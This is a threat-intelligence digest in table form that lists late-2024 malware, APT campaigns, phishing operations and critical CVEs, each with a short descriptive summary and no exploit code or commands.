DATE | NAME | CATEGORY | SUBCATEGORY | INFO |
21.12.24 | CookiePlus Malware | MALWARE | Backdoor | Lazarus Group Spotted Targeting Nuclear Engineers with CookiePlus Malware |
21.12.24 | 2024-12 Reference Advisory: Session Smart Router: Mirai malware found on systems when the default password remains unchanged | BOTNET | BOTNET | On Wednesday, December 11, 2024, several customers reported suspicious behavior on their Session Smart Network (SSN) platforms. These systems have been infected with the Mirai malware and were subsequently used as a DDOS attack source to other devices accessible by their network. The impacted systems were all using default passwords. |
21.12.24 | cShell DDoS Bot Attack | HACKING | HACKING | ASEC recently identified a new DDoS malware strain targeting Linux servers while monitoring numerous external attacks. The threat actor initially targeted poorly managed SSH services and ultimately installed a DDoS bot named cShell. cShell is developed in the Go language and is characterized by exploiting Linux tools called screen and hping3 to perform DDoS attacks. |
21.12.24 | CVE-2023-48788 | VULNERABILITY | VULNERABILITY | (CVSS score: 9.3) - Fortinet FortiClient EMS SQL Injection Vulnerability |
21.12.24 | CVE-2021-44529 | VULNERABILITY | VULNERABILITY | (CVSS score: 9.8) - Ivanti Endpoint Manager Cloud Service Appliance (EPM CSA) Code Injection Vulnerability |
21.12.24 | CVE-2019-7256 | VULNERABILITY | VULNERABILITY | (CVSS score: 10.0) - Nice Linear eMerge E3-Series OS Command Injection Vulnerability |
21.12.24 | CVE-2024-12356 | VULNERABILITY | VULNERABILITY | BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) Command Injection Vulnerability |
21.12.24 | CVE-2024-12727 | VULNERABILITY | VULNERABILITY | (CVSS score: 9.8) - A pre-auth SQL injection vulnerability in the email protection feature that could lead to remote code execution if a specific configuration of Secure PDF eXchange (SPX) is enabled in combination with the firewall running in High Availability (HA) mode. |
21.12.24 | CVE-2024-12728 | VULNERABILITY | VULNERABILITY | (CVSS score: 9.8) - A weak credentials vulnerability arising from a suggested and non-random SSH login passphrase for High Availability (HA) cluster initialization that remains active even after the HA establishment process has completed, thereby exposing an account with privileged access if SSH is enabled. |
21.12.24 | CVE-2024-12729 | VULNERABILITY | VULNERABILITY | (CVSS score: 8.8) - A post-auth code injection vulnerability in the User Portal that allows authenticated users to gain remote code execution. |
21.12.24 | CVE-2023-48782 | VULNERABILITY | VULNERABILITY | (CVSS score: 8.8) - An authenticated command injection flaw, also fixed in FortiWLM 8.6.6, that can be used to obtain remote code execution in the context of root. |
21.12.24 | CVE-2023-34990 | VULNERABILITY | VULNERABILITY | [FortiWLM] Unauthenticated limited file read vulnerability |
18.12.24 | HubPhish | CAMPAIGN | Phishing | Effective Phishing Campaign Targeting European Companies and Organizations |
18.12.24 | CVE-2024-53677 | VULNERABILITY | VULNERABILITY | File upload logic in Apache Struts is flawed. An attacker can manipulate file upload parameters to enable path traversal, and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution. |
18.12.24 | Earth Koshchei | APT | APT | Earth Koshchei Coopts Red Team Tools in Complex RDP Attacks |
18.12.24 | CVE-2024-12356 | VULNERABILITY | VULNERABILITY | A critical vulnerability has been discovered in Privileged Remote Access (PRA) and Remote Support (RS) products which can allow an unauthenticated attacker to inject commands that are run as a site user. |
18.12.24 | CryptoRom | SPAM | SPAM | Sha zhu pan scam uses AI chat tool to target iPhone and Android users |
18.12.24 | DarkGate | MALWARE | RAT | Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion |
18.12.24 | FLUX#CONSOLE | MALWARE | Backdoor | Analyzing FLUX#CONSOLE: Using Tax-Themed Lures, Threat Actors Exploit Windows Management Console to Deliver Backdoor Payloads |
1.11.24 | New variant of FakeCall Android malware | ALERTS | VIRUS | A new variant of the Android malware called FakeCall has been observed in the wild. The attackers behind this malware employ voice phishing (vishing) techniques in order to trick victims into disclosing sensitive information such as credentials or banking information. |
1.11.24 | Sauron - a new ransomware variant in the wild | ALERTS | RANSOM | Sauron is a new ransomware variant recently found in the wild. The malware appends the ".sauron" extension to the encrypted files. The ransom note is dropped in the form of a text file called "#HowToRecover.txt" on the affected machines. The attackers request to be contacted via the provided email address, and the ransom is demanded in the form of a Bitcoin cryptocurrency payment. |
1.11.24 | UNC5812 campaigns against Ukraine with Android and Windows malware | ALERTS | GROUP | A recent report highlighted activity attributed to a suspected Russian threat actor identified as UNC5812. The activity involved distribution of Android and Windows malware targeting Ukrainian military recruits. The intent of the campaign was not only to engage in espionage but also to attempt to negatively influence support for pro-Ukrainian forces. |
1.11.24 | A possible Bumblebee Loader resurgence | ALERTS | VIRUS | A new campaign delivering the Bumblebee loader has been reported this month. Bumblebee is a highly sophisticated downloader variant discovered initially back in 2022. The malware has been spread across a multitude of malicious campaigns and used for the delivery and execution of miscellaneous payloads such as Cobalt Strike, ransomware, etc. |
1.11.24 | CVE-2024-40711 - Veeam Backup and Replication deserialization vulnerability exploited by ransomware actors | ALERTS | VULNERABILITY | CVE-2024-40711 is a recently disclosed critical (CVSS score 9.8) deserialization vulnerability affecting the Veeam Backup and Replication software in version 12.1.2.172 or older. If successfully exploited, the flaw might provide unauthenticated attackers with remote code execution (RCE) on the vulnerable systems. |
1.11.24 | Malicious "Lounge Pass" app targets air travelers in India | ALERTS | VIRUS | A campaign involving a malicious Android app called "Lounge Pass" targeting air travelers at Indian airports has been observed. Distributed through fake domains, the app intercepts and forwards SMS messages from victims' devices to cybercriminals, leading to significant financial losses. |
1.11.24 | Adware Campaign uses Fake CAPTCHA to deliver Lumma and Amadey malware | ALERTS | VIRUS | Threat actors are increasingly using fake CAPTCHA as an initial attack vector. A recent adware campaign is targeting online users by presenting them with fake CAPTCHA or update prompts. Attackers are leveraging ad networks to redirect victims to compromised sites that host these social engineering lures. |
1.11.24 | TeamTNT targets cloud-native environments in new Cryptojacking campaign | ALERTS | CRYPTOCURRENCY | A new campaign by the cryptojacking group TeamTNT has been reported targeting cloud-native environments for cryptocurrency mining and reselling compromised servers. They exploit exposed Docker daemons to deploy Sliver malware, cyber worms and cryptominers, gaining access through exposed Docker ports and using compromised Docker Hub accounts to spread malware and rent out victims' computational power. |
1.11.24 | Rekoobe malware found potentially targeting TradingView users | ALERTS | VIRUS | An open directory has been discovered hosting Rekoobe malware, potentially aimed at targeting TradingView users along with other cyber espionage campaigns. Rekoobe is a versatile backdoor previously deployed by APT31 and other adversaries engaged in cyber espionage and data theft. |
1.11.24 | Daggerfly targets Taiwanese entities with new CloudScout Toolset | ALERTS | APT | China-linked threat actor Daggerfly (also known as Evasive Panda) has been reported targeting a government entity and a religious organization in Taiwan with a previously undocumented post-compromise toolset called CloudScout. This toolset can retrieve data from various cloud services by leveraging stolen web session cookies. Additionally, CloudScout integrates seamlessly with MgBot, Evasive Panda's signature malware framework. |
1.11.24 | Phishing Campaign Distributing XWorm RAT | ALERTS | PHISHING | Researchers have recently uncovered a malicious campaign spreading the XWorm RAT trojan via fake emails posing as official communications from Namirial, a software and service company. The emails prompt users to open a password-protected PDF, and if it fails, directs them to a Dropbox link that downloads a ZIP file containing a URL that would connect to the attacker's servers and download additional malicious scripts, enabling control over the victim's machine. |
1.11.24 | HeptaX Cyberattack Operations | ALERTS | OPERATION | A researcher recently identified a multi-stage cyberattack targeting the healthcare industry, initiated through a ZIP file containing a malicious shortcut (.lnk) file, likely spread via phishing emails. When executed, the LNK file runs a PowerShell command that downloads additional payloads including scripts and BAT files from a remote server. |
1.11.24 | Update on the Recall preview feature | SECURITY | SECURITY | Even before making Recall available to customers, we have heard a clear signal that we can make it easier for people to choose to enable Recall on their Copilot+ PC and improve privacy and security safeguards. With that in mind we are announcing updates that will go into effect before Recall (preview) ships to customers on June 18. |
1.11.24 | Xiū Gǒu Phishing Kit | PHISHING | PHISHING KIT | Every Doggo Has Its Day: Unleashing the Xiū Gǒu Phishing Kit |
1.11.24 | LightSpy | MALWARE | iOS | In May 2024, ThreatFabric published a report about LightSpy for macOS. During that investigation, we discovered that the threat actor was using the same server for both macOS and iOS campaigns. |
1.11.24 | Rare Case of Privilege Escalation Patched in LiteSpeed Cache Plugin | VULNERABILITY | VULNERABILITY | This blog post is about the LiteSpeed plugin vulnerability. If you’re a LiteSpeed user, please update the plugin to at least version 6.5.2. |
30.10.24 | Jumpy Pisces Engages in Play Ransomware | RANSOMWARE | RANSOMWARE | Unit 42 has identified Jumpy Pisces, a North Korean state-sponsored threat group associated with the Reconnaissance General Bureau of the Korean People's Army, as a key player in a recent ransomware incident. |
30.10.24 | CrossBarking | EXPLOIT | VULNERABILITY | “CrossBarking” — Exploiting a 0-Day Opera Vulnerability with a Cross-Browser Extension Store Attack |
30.10.24 | Rampant Phishing | CAMPAIGN | PHISHING | You’re Invited: Rampant Phishing Abuses Eventbrite |
30.10.24 | CryptoAiToolsv0.7 | CRYPTOCURRENCY | CRYPTOCURRENCY | A Python toolkit to create and manage crypto trading bots |
29.10.24 | CVE-2024-7474 | VULNERABILITY | CVE | (CVSS score: 9.1) - An Insecure Direct Object Reference (IDOR) vulnerability that could allow an authenticated user to view or delete external users, resulting in unauthorized data access and potential data loss |
29.10.24 | CVE-2024-7475 | VULNERABILITY | CVE | (CVSS score: 9.1) - An improper access control vulnerability that allows an attacker to update the SAML configuration, thereby making it possible to log in as an unauthorized user and access sensitive information |
29.10.24 | Operation Magnus | OPERATION | OPERATION | On the 28th of October 2024 the Dutch National Police, working in close cooperation with the FBI and other partners of the international law enforcement task force Operation Magnus, disrupted the operation of the Redline and META infostealers. |
29.10.24 | Breaking the Barrier: Post-Barrier Spectre Attac | PAPERS | PAPERS | The effectiveness of transient execution defenses rests on obscure model-specific operations that must be correctly implemented in microcode and applied by software. In this paper, we study branch predictor invalidation through. |
29.10.24 | Breaking the Barrier | VULNERABILITY | CPU | Speculation barriers, in this case barriers that stop previously learned predictions from being used, are critical for computer software and cloud infrastructure to run securely. |
29.10.24 | CloudScout | APT | APT | ESET researchers discovered a previously undocumented toolset used by Evasive Panda to access and retrieve data from cloud services |
28.10.24 | UNC5812 | GROUP | GROUP | Hybrid Russian Espionage and Influence Campaign Aims to Compromise Ukrainian Military Recruits and Deliver Anti-Mobilization Narratives |
28.10.24 | BeaverTail | MALWARE | PYTHON | Tenacious Pungsan: A DPRK threat actor linked to Contagious Interview |
28.10.24 | CVE-2024-38202 | VULNERABILITY | CVE | Windows Update Stack Elevation of Privilege Vulnerability |
28.10.24 | | VULNERABILITY | CVE | Windows Secure Kernel Mode Elevation of Privilege Vulnerability |
28.10.24 | Gun Campaign | CAMPAIGN | CAMPAIGN | TeamTNT’s Docker Gatling Gun Campaign |
28.10.24 | Qilin | RANSOMWARE | RANSOMWARE | New Qilin.B Ransomware Variant Boasts Enhanced Encryption and Defense Evasion |
28.10.24 | Multi-Turn Context Jailbreak Attack on Larg | PAPERS | PAPERS | Large language models (LLMs) have significantly enhanced the performance of numerous applications, from intelligent conversations to text generation. However, their inherent security vulnerabilities have become an increasingly significant challenge, especially with respect to jailbreak attacks. |
28.10.24 | CVE-2024-38094 | VULNERABILITY | CVE | Microsoft SharePoint Remote Code Execution Vulnerability |
28.10.24 | CVE-2024-47575 | VULNERABILITY | CVE | A missing authentication for critical function in FortiManager 7.6.0, FortiManager 7.4.0 through 7.4.4, FortiManager 7.2.0 through 7.2.7, FortiManager 7.0.0 through 7.0.12, FortiManager 6.4.0 through 6.4.14, FortiManager 6.2.0 through 6.2.12, Fortinet FortiManager Cloud 7.4.1 through 7.4.4, FortiManager Cloud 7.2.1 through 7.2.7, FortiManager Cloud 7.0.1 through 7.0.13, FortiManager Cloud 6.4.1 through 6.4.7 allows an attacker to execute arbitrary code or commands via specially crafted requests. |
28.10.24 | Lazarus APT | APT | APT | The Crypto Game of Lazarus APT: Investors vs. Zero-days |
28.10.24 | CVE-2024-20481 | VULNERABILITY | CVE | Cisco Adaptive Security Appliance and Firepower Threat Defense Software Remote Access VPN Brute Force Denial of Service Vulnerability |
28.10.24 | Grandoreiro | MALWARE | BANKING | Grandoreiro, the global trojan with grandiose goals |
28.10.24 | Using gRPC and HTTP/2 for Cryptominer Deployment: An Unconventional Approach | CRYPTOCURRENCY | CRYPTOCURRENCY | Trend Micro researchers recently observed a malicious actor targeting Docker remote API servers to deploy the SRBMiner cryptominer and mine XRP cryptocurrency. |
28.10.24 | CVE-2024-38812 | VULNERABILITY | CVE | VMSA-2024-0019: VMware vCenter Server updates address heap-overflow and privilege escalation vulnerabilities (CVE-2024-38812, CVE-2024-38813) |
28.10.24 | End-to-End Encrypted Cloud Storage in the Wild: A Broken Ecosyst | PAPERS | PAPERS | Cloud storage is ubiquitous: Google Drive, Dropbox, and OneDrive are household names. However, these services do not provide end-to-end encryption (E2EE), meaning that the provider has access to the data stored on their servers. The promise of end-to-end encrypted cloud storage is that users can have the best of both worlds, keeping control of their data using cryptographic techniques, while still benefiting from low-cost storage solutions. |
28.10.24 | Iranian Cyber Actors’ Brute Force and Credential Access Activity Compromises Critical Infrastructure Organizations | BIGBROTHER | BIGBROTHER | Iranian Cyber Actors’ Brute Force and Credential Access Activity Compromises Critical Infrastructure Organizations |
28.10.24 | ClickFix | CAMPAIGN | SOCIAL | ClickFix tactic: The Phantom Meet |
28.10.24 | Latrodectus | MALWARE | LOADER | Analyzing Latrodectus: The New Face of Malware Loaders |
28.10.24 | CVE-2024-8260 | VULNERABILITY | CVE | An SMB force-authentication vulnerability exists in all versions of OPA for Windows prior to v0.68.0. The vulnerability exists because of improper input validation, allowing a user to pass an arbitrary SMB share instead of a Rego file as an argument to the OPA CLI or to one of the OPA Go library’s functions. |
28.10.24 | Gophish Framework | PHISHING | CAMPAIGN | Threat actor abuses Gophish to deliver new PowerRAT and DCRAT |
28.10.24 | Crypt Ghouls | GROUP | GROUP | Analysis of the Crypt Ghouls group: continuing the investigation into a series of attacks on Russia |
28.10.24 | CVE-2024-37383 | VULNERABILITY | CVE | Fake attachment. Roundcube mail server attacks exploit CVE-2024-37383 vulnerability. |
27.10.24 | CVE-2024-9487 | VULNERABILITY | CVE | 3.14.2: Security fixes |
27.10.24 | Water Makara | GROUP | GROUP | Water Makara Uses Obfuscated JavaScript in Spear Phishing Campaign, Targets Brazil With Astaroth Malware |
27.10.24 | FASTCash | MALWARE | LINUX | Analysis of a newly discovered Linux based variant of the DPRK attributed FASTCash malware along with background information on payment switches used in financial networks. |
27.10.24 | TrickMo | MALWARE | BANKING | Expanding the Investigation: Deep Dive into Latest TrickMo Samples |
27.10.24 | DarkVision RAT | MALWARE | RAT | DarkVision RAT is a highly customizable remote access trojan (RAT) that first surfaced in 2020, offered on Hack Forums and their website for as little as $60. Written in C/C++ and assembly, DarkVision RAT has gained popularity due to its affordability and extensive feature set, making it accessible even to low-skilled cybercriminals. |
27.10.24 | CVE-2024-38178 | VULNERABILITY | CVE | Scripting Engine Memory Corruption Vulnerability |
27.10.24 | OperationCodeonToast | OPERATION | OPERATION | AhnLab and NCSC Release Joint Report on Microsoft Zero-Day Browser Vulnerability (CVE-2024-38178) |
27.10.24 | EDRSilencer | TOOL | HACKING | Trend Micro's Threat Hunting Team has observed EDRSilencer, a red team tool that threat actors are attempting to abuse for its ability to block EDR traffic and conceal malicious activity. |
27.10.24 | CVE-2024-9486 | VULNERABILITY | CVE | VM images built with Image Builder and Proxmox provider use default credentials in github.com/kubernetes-sigs/image-builder |
27.10.24 | SideWinder | APT | GROUP | Beyond the Surface: the evolution and expansion of the SideWinder APT group |
27.10.24 | Cicada3301 | RANSOMWARE | RANSOMWARE | Encrypted Symphony: Infiltrating the Cicada3301 Ransomware-as-a-Service Group |
27.10.24 | UAT-5647 | GROUP | APT | UAT-5647 targets Ukrainian and Polish entities with RomCom malware variants |
27.10.24 | Multiple vulnerabilities affecting Palo Alto Networks Expedition | ALERTS | VULNERABILITY | Multiple vulnerabilities affecting Palo Alto Networks Expedition have been disclosed this month. The reported flaws (CVE-2024-9463, CVE-2024-9464, CVE-2024-9465, CVE-2024-9466, CVE-2024-9467) have been rated between CVSS 7.0 and CVSS 9.9 and include a mix of command injection, cross-site scripting (XSS), cleartext storage of sensitive information, missing authentication, and SQL injection vulnerabilities. |
27.10.24 | CVE-2024-47575 - Fortinet FortiManager Missing Authentication vulnerability | ALERTS | VULNERABILITY | CVE-2024-47575 is a zero-day vulnerability affecting Fortinet FortiManager that was disclosed just this month. The vulnerability has been rated with a critical CVSS score of 9.8. If successfully exploited, it could allow remote unauthenticated attackers to execute arbitrary code via specially crafted requests. |
27.10.24 | Parano Stealer | ALERTS | VIRUS | Parano Stealer is another "run-of-the-mill" infostealer variant recently observed in the wild. This Python-based malware has functionality to collect and exfiltrate various information from the compromised endpoints, including: credentials, cookies, miscellaneous data stored in web browsers, cryptocurrency wallets, system information or data from various 3rd party applications like Steam, Telegram or Discord. |
27.10.24 | Liberium RAT malware | ALERTS | VIRUS | Liberium RAT (also known as ShadowRoot) is a malware variant recently advertised for sale on hacking forums. The malware has the capabilities allowing the attackers remote access to the vulnerable endpoints, file management operations, registry manipulation as well as theft of system related information and other confidential data. |
27.10.24 | CVE-2024-38094 - Microsoft SharePoint Deserialization vulnerability exploited in the wild | ALERTS | VULNERABILITY | CVE-2024-38094 is a deserialization vulnerability affecting Microsoft SharePoint, which was initially disclosed and patched back in July 2024. The flaw, rated with a CVSS score of 7.2, arises from the product deserializing data without enough verification that the resulting data output will be valid. |
27.10.24 | Prometei botnet activity | ALERTS | BOTNET | New Prometei botnet activity has been reported in the wild. The botnet has historically been used mostly for Monero cryptomining operations, but over time the attackers behind it updated the botnet's capabilities to conduct even more complex attacks, allowing full control over the infected machines as well as additional arbitrary payload deployments. |
27.10.24 | DarkComet Backdoor | ALERTS | VIRUS | DarkComet is a powerful Remote Access Trojan (RAT) that remains a significant threat because of its stealthy operations and comprehensive functionality. It enables attackers to remotely control infected devices, exfiltrate sensitive data, and deploy further malware. It can evade detection by altering file attributes, manipulating registry keys and escalating privileges. |
27.10.24 | Threat actors distribute WarmCookie malware via various campaigns | ALERTS | VIRUS | WarmCookie is malware that has been observed being distributed through various campaigns, including malicious emails. This malware provides initial access to a compromised victim and is used to establish persistence. Additional functionality associated with WarmCookie includes remote command execution, file system manipulation, and payload delivery, among others. |
27.10.24 | Crystal Rans0m: Rust-Based Hybrid Ransomware | ALERTS | RANSOM | Crystal Rans0m is a Rust-based hybrid ransomware that combines file encryption with data-stealing capabilities that has been observed targeting Italy and Russia. The malware can steal browser data, Discord tokens, Steam files, Riot Games data and utilizes Discord webhooks for data exfiltration. |
27.10.24 | CVE-2024-9680 - Mozilla Firefox Remote Code Execution vulnerability | ALERTS | VULNERABILITY | CVE-2024-9680 is a recently disclosed Remote Code Execution (RCE) vulnerability affecting Mozilla Firefox and Thunderbird software. The vulnerability has been assigned a critical CVSS score of 9.8 and arises from a "use-after-free" flaw in the animation timeline component of the browser. |
27.10.24 | Phemedrone Stealer | ALERTS | VIRUS | Phemedrone is an open-source infostealer variant observed being distributed in the wild this year. The malware is written in C# and has the functionality to collect and exfiltrate various sensitive information such as login credentials, data stored in browsers, cookies, credit card information, cryptocurrency wallets, files stored in "My Documents" folders or data from other 3rd party apps such as Steam, Discord or Telegram. |
27.10.24 | Akira Ransomware Evolution: A move towards cross-platform adaptability | ALERTS | RANSOM | Earlier this year, Akira developed a new version of its ransomware encryptor and has since been observed using another novel iteration of the encryptor that targets both Windows and Linux systems. Akira typically employs a double-extortion tactic, exfiltrating critical data before encrypting the victim's systems. However, starting in early 2024, the group appears to be shifting away from encryption tactics, focusing solely on data exfiltration. |
27.10.24 | Ghostpulse Malware: Shifting tactics from PNGs to Pixel values | ALERTS | VIRUS | According to recent reports, Ghostpulse malware has evolved its tactics by shifting from hiding its encrypted configuration and payload in the IDAT chunk of PNG files, to embedding it directly within the pixel values themselves to evade detection. In recent campaigns, attackers have employed social engineering techniques such as CAPTCHA validations to deceive users which ultimately triggers malicious commands via Windows keyboard shortcuts. |
27.10.24 | CVE-2024-28987 - SolarWinds Web Help Desk Hardcoded Credential vulnerability | ALERTS | VULNERABILITY | CVE-2024-28987 is a recently disclosed hardcoded credential vulnerability affecting the SolarWinds Web Help Desk (WHD) software. The flaw is rated as critical (CVSS score 9.1) and, if successfully exploited, could allow remote unauthenticated attackers to access internal software functionality and modify data. |
27.10.24 | Threat actors abusing open-source phishing framework to deliver RATs | ALERTS | VIRUS | A recent report by CTA member Cisco Talos disclosed a new phishing campaign abusing the open-source phishing readiness assessment framework named 'Gophish' to deploy one of two attack chains. The first uses Pidief-infected Office docs to deploy a newly discovered PowerShell RAT dubbed 'PowerRAT', while the second employs malicious HTML files and GOLoader to deploy DCRAT. |
27.10.24 | IcePeony: China-linked APT group targeting Southeast Asian governments | ALERTS | APT | A recently identified APT group linked to China dubbed IcePeony has been detected conducting malware campaigns targeting government agencies and institutions in countries such as India, Mauritius, and Vietnam. The group's attack vector often involves SQL injection, leading to compromises via web shells and backdoors that utilize custom malware like "IceCache" to infiltrate networks. |
27.10.24 | Lumma Stealer delivered via Fake CAPTCHA | ALERTS | VIRUS | Researchers are monitoring an ongoing phishing campaign where attackers appear to have upped their tactics from traditional phishing to incorporating the use of fake CAPTCHA pages and exploiting legitimate software. The intention being to eventually lure users into executing a payload called Lumma Stealer. This infostealing malware is a MaaS (Malware-as-a-Service) variant that steals sensitive data such as passwords and cryptocurrency information. |
27.10.24 | Phishing Campaign Delivering Wiper Malware | ALERTS | PHISHING | A recent campaign was observed by researchers where threat actors were seen targeting Israeli organizations, by impersonating a certain antivirus vendor and sending out phishing emails warning of state-backed threats. The emails include a link to a fake program that downloads a malware called Wiper, designed to erase data. |
27.10.24 | Phishing attack aims at Meta Ads Professionals with Quasar RAT | ALERTS | PHISHING | A malware campaign targeting job seekers and digital marketing professionals has been reported. The campaign specifically focuses on Meta Ads professionals and is believed to be driven by a Vietnamese Threat Actor. The attack chain begins with a phishing email containing an archive attachment that disguises a malicious LNK file as a PDF. When opened, the LNK file triggers PowerShell commands that lead to the download and execution of additional scripts, ultimately resulting in the delivery of the Quasar RAT payload. |
27.10.24 | ClickFix Tactic: New malware campaigns preying on Google Meet users | ALERTS | CAMPAIGN | Various malware campaigns utilizing the emerging ClickFix tactic have been reported since June 2024. One such campaign distributing infostealers through fake Google Meet pages, a popular video communication service has been reported in the wild. Users are lured by emails that appear to be legitimate Google Meet invitations for work meetings, conferences, or other significant events. |
27.10.24 | Recent malicious activities attributed to the UAT-5647 threat group | ALERTS | GROUP | According to the report published by Cisco Talos, UAT-5647 threat group has been targeting entities in Ukraine and Poland in their most recent campaigns. The threat actors have been distributing two distinct downloader variants called RustyClaw and MeltingClaw, a new RomCom malware variant dubbed SingleCamper, as well as DustyHammock and ShadyHammock backdoors. |
27.10.24 | Emerging Stealer Variants: Divulge, DedSec, and Duck Stealers | ALERTS | VIRUS | Multiple stealers have been observed being advertised on hacker forums, GitHub, and Telegram, all developed and promoted by the same entity. Notable variants include Divulge Stealer (a copy of Umbral), DedSec Stealer (based on Doenerium), and Duck Stealer (a derivative of AZStealer). |
27.10.24 | TrickMo targeting Android users with fake lock-screen | ALERTS | VIRUS | Security researchers have recently disclosed a new variant of TrickMo, a mobile banking trojan that targets Android and iOS users. This new variant comes with some new functionality in addition to the existing capabilities, such as screen recording, remote control, and permissions granting. |
27.10.24 | Lockbit ransomware pretender targets macOS and Windows environments for data theft | ALERTS | RANSOM | A new campaign leveraging a malware variant disguised as Lockbit ransomware has been reported in the wild. The Go-based malware targets both macOS and Windows users in attempts to encrypt and exfiltrate confidential data. The stolen information is uploaded to Amazon AWS S3 buckets controlled by the attackers. The malware encrypts user files, deletes shadow copies on the infected machines and appends the .abcd extension to the encrypted files. The ransomware then changes the desktop wallpaper to one copied over from Lockbit 2.0 attacks. This action is clearly a tactic meant to pressure the victims into paying the demanded ransom. |
27.10.24 | Microsoft Windows Kernel TOCTOU Race Condition Vulnerability (CVE-2024-30088) | ALERTS | VULNERABILITY | CVE-2024-30088 is a Time-Of-Check Time-Of-Use (TOCTOU) race condition vulnerability in the Microsoft Windows Kernel. It arises when the state of a resource is modified between its validation (check) and actual use, allowing attackers to exploit the gap for privilege escalation. |
27.10.24 | Leafperforator APT group expands operations into the Middle East and Africa | ALERTS | APT | |
27.10.24 | Meduza Stealer | ALERTS | VIRUS | Researchers recently published a warning about the Telegram account '@reserveplusbot', linked to a specific application and serving as a contact for technical support. The suspicious messages urged users to install a ZIP file that contains malware. The executable file inside is a variant of Meduza Stealer, which steals files and evades detection by modifying Microsoft Defender settings. |
27.10.24 | New Linux variant of FASTCash malware discovered | ALERTS | VIRUS | A new Linux variant of the FASTCash malware (a tool which CISA has attributed to North Korea) has been discovered. FASTCash is malware that is implanted within compromised networks and leveraged to perform unauthorized banking transactions. |
27.10.24 | CVE-2024-44849 - Qualitor Remote Code Execution (RCE) vulnerability | ALERTS | VULNEREBILITY | CVE-2024-44849 is a critical (CVSS: 9.8) Remote Code Execution (RCE) vulnerability in Qualitor, a platform for managing customer service processes and centralizing services. The flaw allows remote code execution through an arbitrary file upload in Qualitor versions before 8.24. |
27.10.24 | ThunderKitty malware | ALERTS | VIRUS | ThunderKitty is a Go-based open-source infostealer variant seen in the wild. The malware collects miscellaneous information from infected machines, including banking details, Discord session tokens, cookies, browser history and other data stored in browsers. ThunderKitty implements several evasion and anti-analysis techniques, including virtual-machine and debugger detection, as well as persistence mechanisms. |
27.10.24 | CVE-2024-45519 - Remote Code Execution vulnerability in Zimbra Collaboration Suite | ALERTS | VULNEREBILITY | CVE-2024-45519 is a recently disclosed Remote Code Execution (RCE) vulnerability in Zimbra Collaboration Suite (ZCS) affecting versions before 8.8.15 Patch 46, 9 before 9.0.0 Patch 41, 10 before 10.0.9, and 10.1 before 10.1.1. The flaw stems from improper sanitization of user input; if successfully exploited, it could allow unauthenticated attackers to execute arbitrary code within the context of the vulnerable Zimbra installation. |
27.10.24 | INTERLOCK Ransomware | ALERTS | RANSOM | A new ransomware actor, going by the name INTERLOCK, has recently emerged in the threat landscape. This group appears to employ a double-extortion tactic. On successful compromise, encrypted files are appended with the ".interlock" extension. |
27.10.24 | Attackers still using SHTML files to target recipients with phishing | ALERTS | PHISHING | Symantec has recently observed a new phishing campaign using attached SHTML files disguised as import or payment forms. The messages attempt to entice users to open the attached files to resolve import or billing issues. If the recipient opens the form, they are greeted with a fake 'DHL' login page that exfiltrates the entered credentials to a private Telegram channel for the attacker to use later. |
27.10.24 | MiyaRat: The latest tool from the Bitter APT group | ALERTS | VIRUS | The Bitter APT group, recognized for its sophisticated cyber espionage activities targeting East and South Asia, has been observed deploying a new malware known as MiyaRat. This malware is capable of collecting system information, capturing screenshots, performing file uploads and downloads, and exfiltrating data to its command-and-control (C2) server, where it waits for further instructions. |
27.10.24 | CVE-2024-43363 - Cacti RCE vulnerability | ALERTS | VULNEREBILITY | CVE-2024-43363 is a remote code execution (RCE) vulnerability in Cacti, a network monitoring and fault management framework. The flaw is exploited via log poisoning on vulnerable instances, which can ultimately allow attackers to execute arbitrary commands. The vulnerability is fixed in version 1.2.28 and later. |
27.10.24 | Abuse of Code-Signing Certificates in Lumma Stealer deployment via HijackLoader | ALERTS | VIRUS | A malware campaign has been observed deploying Lumma Stealer using HijackLoader. The attack vector employs a "fake CAPTCHA" to lure users into executing a PowerShell payload that downloads a ZIP archive containing either a DLL or a signed HijackLoader binary. |
27.10.24 | CoreWarrior Malware | ALERTS | VIRUS | Researchers investigated a malware named CoreWarrior and found that this variant aggressively spreads by creating numerous copies, connecting to various IP addresses, opening multiple backdoor access points, and intercepting Windows UI elements for surveillance purposes. |
27.10.24 | Core Werewolf utilizes AutoIt loader and Telegram for Cyber attacks | ALERTS | VIRUS | The Core Werewolf threat actor group, which primarily targets Russia's defense industry and critical infrastructure, has been observed using new tools including an AutoIt loader and delivering malicious files via Telegram in addition to email. |
27.10.24 | ErrorFather Android Trojan | ALERTS | VIRUS | ErrorFather is a new variant of the Cerberus Android banking trojan, which came to light in 2019. It utilizes a multi-stage dropper to deploy its payload and can carry out financial fraud through remote attacks, keylogging, and overlay tactics. The emergence of ErrorFather highlights the persistent danger of repurposed malware, as cybercriminals continue to exploit leaked source code years after the original Cerberus malware was discovered. |
27.10.24 | Demodex targeting American telecommunications | ALERTS | VIRUS | APT group 'Squash' has been reported to be utilizing Demodex to target American telecommunications providers. Demodex, a rootkit, is used to establish persistence; files with fake file headers (PNG, JPEG and WAV have been observed) are then used to evade detection and to establish C2 communications. |
27.10.24 | CVE-2024-43573 - Microsoft Windows MSHTML Platform spoofing vulnerability | ALERTS | VULNEREBILITY | CVE-2024-43573 is a spoofing vulnerability recently disclosed as part of the October 2024 Patch Tuesday. It affects the Microsoft Windows MSHTML Platform. Assigned a CVSS score of 6.5 (Moderate), the flaw might allow attackers to execute arbitrary code within the context of the vulnerable application. |
27.10.24 | New Pronsis Loader malware leveraged for Lumma Stealer and Latrodectus delivery | ALERTS | VIRUS | Pronsis Loader is a new malware variant leveraged recently in campaigns delivering Lumma Stealer and Latrodectus payloads. The malware utilizes executables compiled in JPHP programming language, which is a Java implementation of PHP. |
27.10.24 | LemonDuck: The evolving Multi-Platform cryptomining malware | ALERTS | VIRUS | LemonDuck, a well-known cryptomining malware, has evolved into a multi-platform threat and has been observed exploiting SMB vulnerabilities, particularly EternalBlue, as part of its attack vector to gain network access. |
27.10.24 | CVE-2024-7954 - Remote Code Execution vulnerability in SPIP Porte Plume Plugin | ALERTS | VULNEREBILITY | CVE-2024-7954 is a critical (CVSS score 9.8) Remote Code Execution (RCE) vulnerability in the porte_plume plugin used by SPIP versions prior to 4.30-alpha2, 4.2.13, and 4.1.16. SPIP is a free-software content management system (CMS) for publishing websites. |
